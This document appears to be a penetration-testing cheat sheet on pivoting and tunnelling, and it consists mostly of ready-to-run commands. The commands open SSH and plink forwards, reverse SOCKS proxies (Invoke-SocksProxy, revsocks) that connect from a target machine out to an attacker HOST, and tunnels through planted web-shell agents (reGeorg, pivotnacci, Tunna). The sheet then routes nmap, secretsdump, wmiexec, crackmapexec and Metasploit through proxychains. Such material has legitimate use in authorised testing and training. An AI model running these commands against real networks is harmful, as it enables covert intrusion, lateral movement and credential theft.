With the exception of SSH commands, everything in the list does not require authentication and can be executed as a normal user – no admin privilege needed!

SSH

Opens a dynamic socks proxy that listens to port 1234.

ssh USER@HOST -D 1234 -fN

Remote port forward using plink.

plink USER@HOST -pw password -R 3388:127.0.0.1:3389
rdesktop 127.0.0.1:3388

Using sshuttle, a transparent proxy server that works as a poor man’s VPN.

sshuttle --dns -r USER@HOST 0/0

POWERSHELL

Socks proxy with Powershell using Invoke-SocksProxy.

Import-Module .\Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindPort 10800 -threads 400
plink USER@HOST -pw password -R 1080:127.0.0.1:10800

Supports reverse connections as well!

git clone https://github.com/p3nt4/Invoke-SocksProxy.git && cd Invoke-SocksProxy
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout private.key -out cert.pem
openssl x509 -in cert.pem -noout -sha1 -fingerprint | cut -d "=" -f 2 | tr -d ":"
python ReverseSocksProxyHandler.py 443 1080 ./cert.pem ./private.key

In the target machine, run these commands.

Import-Module .\Invoke-SocksProxy.psm1
Invoke-ReverseSocksProxy -remotePort 443 -useSystemProxy -remoteHost HOST

GO

Reverse SOCKS5 implementation using revsocks.

git clone https://github.com/kost/revsocks.git
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
cd revsocks
GOOS=windows GOARCH=amd64 go build -ldflags -H=windowsgui
revsocks -listen :443 -socks 127.0.0.1:1080 -pass PASSWORD

revsocks -connect HOST:443 -pass PASSWORD

WEB APPLICATION

Using pivotnacci.

git clone https://github.com/blackarrowsec/pivotnacci.git
cd pivotnacci && pip3 install -r requirements.txt
python3 setup.py install

pivotnacci https://HOST/agent.php --password 'PASSWORD' -p 1080

Via reGeorg.

git clone https://github.com/sensepost/reGeorg.git && cd reGeorg
python reGeorgSocksProxy.py -p 1080 -u http://HOST/tunnel.jsp

With Tunna.

git clone https://github.com/SECFORCE/Tunna.git && cd Tunna
python proxy.py -u http://HOST/agent.aspx -l 1080 -v

PROXYCHAINS

After setting everything up and you have a working socks proxy, you can make use of proxychains.

git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure --prefix=/usr --sysconfdir=/etc
make && make install && make install-config

proxychains4 -q nmap -sT -Pn -sV HOST -p 80,445,3389
proxychains4 -q secretsdump.py
proxychains4 -q wmiexec.py
proxychains4 -q crackmapexec
proxychains4 -q firefox
proxychains4 -q msfconsole